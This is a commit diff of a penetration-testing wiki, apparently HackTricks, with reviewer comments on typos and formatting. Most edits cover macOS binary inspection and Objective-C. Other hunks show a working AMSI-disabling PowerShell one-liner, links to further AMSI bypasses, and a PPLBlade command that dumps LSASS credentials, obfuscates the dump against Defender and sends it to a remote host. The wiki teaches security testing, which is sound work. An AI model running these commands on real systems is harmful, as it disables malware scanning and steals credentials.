GITBOOK-4078: change request with no subject merged in GitBook
carlospolop authored and gitbook-bot committed Sep 11, 2023
1 parent 85f1578 commit f2d97a4
Showing 6 changed files with 34 additions and 12 deletions.
Expand Up @@ -23,17 +23,20 @@ otool -tv /bin/ps #Decompile application

### objdump

{% code overflow="wrap" %}
```bash
objdump -m --dylibs-used /bin/ls #List dynamically linked libraries
objdump -m -h /bin/ls # Get headers information
objdump -m --syms /bin/ls # Check if the symbol table exists to get function names
objdump -m --full-contents /bin/ls # Dump every section
objdump -d /bin/ls # Dissasemble the binary
objdump --disassemble-symbols=_hello --x86-asm-syntax=intel toolsdemo #Disassemble a function using intel flavour
```
{% endcode %}

### jtool2

The tool can be used as a **replacement** for **codesign**, **otool**, and **objdump**, and provides a few additional features.
The tool can be used as a **replacement** for **codesign**, **otool**, and **objdump**, and provides a few additional features. [**Download it here**](http://www.newosxbook.com/tools/jtool.html).

```bash
# Install
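Review bot: the download link added on the jtool2 line uses plain http://www.newosxbook.com/tools/jtool.html; since readers will fetch a tool binary from it, check whether the site serves the page over https and use that scheme if so. While this section is being touched, the unchanged context line `objdump -d /bin/ls # Dissasemble the binary` misspells "Disassemble".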
Expand All @@ -47,7 +50,6 @@ jtool2 -D /bin/ls # Decompile binary

# Get signature information
ARCH=x86_64 jtool2 --sig /System/Applications/Automator.app/Contents/MacOS/Automator

```

### Codesign
@@ -1,4 +1,4 @@
# macOS Basic Objective-C
# macOS Objective-C

<details>

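Review bot: renaming the page title from "macOS Basic Objective-C" to "macOS Objective-C" is not accompanied in this commit by a change to SUMMARY.md or to any page that links here; confirm the GitBook summary entry and inbound links still resolve, otherwise the rename leaves a dangling entry.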
Expand Down Expand Up @@ -258,11 +258,11 @@ NSMutableArray *mutColorsArray = [NSMutableArray array];
[mutColorsArray addObject:@"yellow"];
[mutColorsArray replaceObjectAtIndex:0 withObject:@"purple"];

// Sets
// Inmutable Sets
NSSet *fruitsSet1 = [NSSet setWithObjects:@"apple", @"banana", @"orange", nil];
NSSet *fruitsSet2 = [NSSet setWithArray:@[@"apple", @"banana", @"orange"]];

// Inmutable sets
// Mutable sets
NSMutableSet *mutFruitsSet = [NSMutableSet setWithObjects:@"apple", @"banana", @"orange", nil];
[mutFruitsSet addObject:@"grape"];
[mutFruitsSet removeObject:@"apple"];
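Review bot: the new comment `// Inmutable Sets` misspells "Immutable"; since this hunk already rewrites both comments, write `// Immutable sets` and `// Mutable sets` so the spelling and casing match each other.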
Expand Up @@ -148,7 +148,7 @@ There are about **50 different types of load commands** that the system handles
### **LC\_SEGMENT/LC\_SEGMENT\_64**

{% hint style="success" %}
Basically, this type of Load Command define **how to load the sections** that are stored in DATA when the binary is executed.
Basically, this type of Load Command define **how to load the \_\_TEXT** (executable code) **and \_\_DATA** (data for the process) **segments** according to the **offsets indicated in the Data section** when the binary is executed.
{% endhint %}

These commands **define segments** that are **mapped** into the **virtual memory space** of a process when it is executed.
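Review bot: the rewritten hint still reads "this type of Load Command define", which should be "defines"; more importantly, LC_SEGMENT/LC_SEGMENT_64 commands describe every segment to be mapped, not only __TEXT and __DATA, as this file's own list of common segments (which starts with `__PAGEZERO`) shows a few lines further down. Phrase it as "segments such as __TEXT ... and __DATA" rather than implying those are the only two.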
Expand Down Expand Up @@ -215,12 +215,12 @@ Common segments loaded by this cmd:

* **`__PAGEZERO`:** It instructs the kernel to **map** the **address zero** so it **cannot be read from, written to, or executed**. The maxprot and minprot variables in the structure are set to zero to indicate there are **no read-write-execute rights on this page**.&#x20;
* This allocation is important to **mitigate NULL pointer dereference vulnerabilities**.
* **`__TEXT`**: Contains **executable** **code** and **data** that is **read-only.** Common sections of this segment:
* **`__TEXT`**: Contains **executable** **code** with **read** and **execute** permissions (no writable)**.** Common sections of this segment:
* `__text`: Compiled binary code
* `__const`: Constant data
* `__cstring`: String constants
* `__stubs` and `__stubs_helper`: Involved during the dynamic library loading process
* **`__DATA`**: Contains data that is **writable.**
* **`__DATA`**: Contains data that is **readable** and **writable** (no executable)**.**
* `__data`: Global variables (that have been initialized)
* `__bss`: Static variables (that have not been initialized)
* `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, etc): Information used by the Objective-C runtime
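Review bot: "(no writable)" and "(no executable)" in the rewritten `__TEXT` and `__DATA` lines should be "(not writable)" and "(not executable)", and the `**.**` after each closing parenthesis bolds a lone period, which renders oddly; move the period outside the bold markers. The permission split itself (read and execute for `__TEXT`, read and write for `__DATA`) is correct.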
Expand Down Expand Up @@ -289,7 +289,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section
The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.

{% hint style="success" %}
The data is basically the part containing all the information loaded by the load commands LC\_SEGMENTS\_64
The data is basically the part containing all the **information** that is loaded by the load commands **LC\_SEGMENTS\_64**
{% endhint %}

![](<../../../.gitbook/assets/image (507) (3).png>)
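Review bot: the hint's bolded load command name "LC_SEGMENTS_64" does not match the actual command name, which the heading earlier in this same file spells as LC_SEGMENT_64 (no S); this hunk rewrites the line anyway, so correct the name here.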
2 changes: 2 additions & 0 deletions windows-hardening/av-bypass.md
Expand Up @@ -191,9 +191,11 @@ Since AMSI is implemented by loading a DLL into the powershell (also cscript.exe

Forcing the AMSI initialization to fail (amsiInitFailed) will result that no scan will be initiated for the current process. Originally this was disclosed by [Matt Graeber](https://twitter.com/mattifestation) and Microsoft has developed a signature to prevent wider usage.

{% code overflow="wrap" %}
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
{% endcode %}

All it took was one line of powershell code to render AMSI unusable for the current powershell process. This line has of course been flagged by AMSI itself, so some modification is needed in order to use this technique.

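Review bot: wrapping the one-liner in `{% code overflow="wrap" %}` is fine and the `{% endcode %}` is correctly paired; while this block is being edited, the unchanged sentence above it, "will result that no scan will be initiated", reads awkwardly and could be "means that no scan is initiated".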
6 changes: 5 additions & 1 deletion windows-hardening/basic-powershell-for-pentesters/README.md
Expand Up @@ -204,7 +204,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html

### AMSI Bypass 2 - Managed API Call Hooking

Check [**this post for detailed info**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)\*\*\*\*[ **and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/).
Check [**this post for detailed info**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)[ **and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/).

This new technique relies upon API call hooking of .NET methods. As it turns out, .NET Methods need to get compiled down to native machine instructions in memory which end up looking very similar to native methods. These compiled methods can hooked to change the control flow of a program.

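Review bot: removing the stray `\*\*\*\*` fixes the rendering, but both bracketed links ("this post for detailed info" and "and the code") point at the same URL, so the second link adds nothing; merge them into a single link or drop the duplicate.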
Expand All @@ -217,6 +217,10 @@ The steps performing API cal hooking of .NET methods are:
5. Find the location of each method in memory
6. Overwrite the target method with instructions pointing to our malicious method

### AMSI Bypass 3 - SeDebug Privilege

[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) you can see how with enough privileges to debug processes, you can spawn a powershell.exe process, debug it, monitor when it loads `amsi.dll` and disable it.

## PS-History

```powershell
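Review bot: the new heading "AMSI Bypass 3 - SeDebug Privilege" should name the privilege as Windows does, SeDebugPrivilege, so readers searching token privileges or audit logs find the exact string; the new paragraph already states the precondition ("enough privileges to debug processes"), and it is worth making explicit that this is a high-privilege technique, which is the detection-relevant point for defenders. The unchanged context line above, "API cal hooking", is missing an l.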
18 changes: 16 additions & 2 deletions windows-hardening/stealing-credentials/README.md
Expand Up @@ -122,6 +122,22 @@ Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp
```

## Dumpin lsass with PPLBlade

[**PPLBlade**](https://github.com/tastypepperoni/PPLBlade) is a Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

**Key functionalities**:

1. Bypassing PPL protection
2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

{% code overflow="wrap" %}
```bash
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
```
{% endcode %}

## CrackMapExec

### Dump SAM hashes
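Review bot: the new heading "Dumpin lsass with PPLBlade" is missing a g, and "a Protected Process Dumper Tool that support obfuscating" should be "supports". The fence is tagged `bash` although `PPLBlade.exe` is a Windows executable run from a Windows shell, so a `powershell` or `cmd` tag would be more accurate, and the address `192.168.1.17` and port `1234` in the sample should be stated to be placeholders for the reader's own listener.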
Expand Down Expand Up @@ -322,8 +338,6 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
[**Learn about some credentials protections here.**](credentials-protections.md)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
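Review bot: this hunk removes two lines (8 to 6) and the visible result places `<details>` directly after the "Learn about some credentials protections here" link; in markdown a raw HTML block needs a blank line before it to start a new block, otherwise the `<details>` element can be rendered inline as part of the preceding paragraph. Keep one blank line between the link and `<details>`.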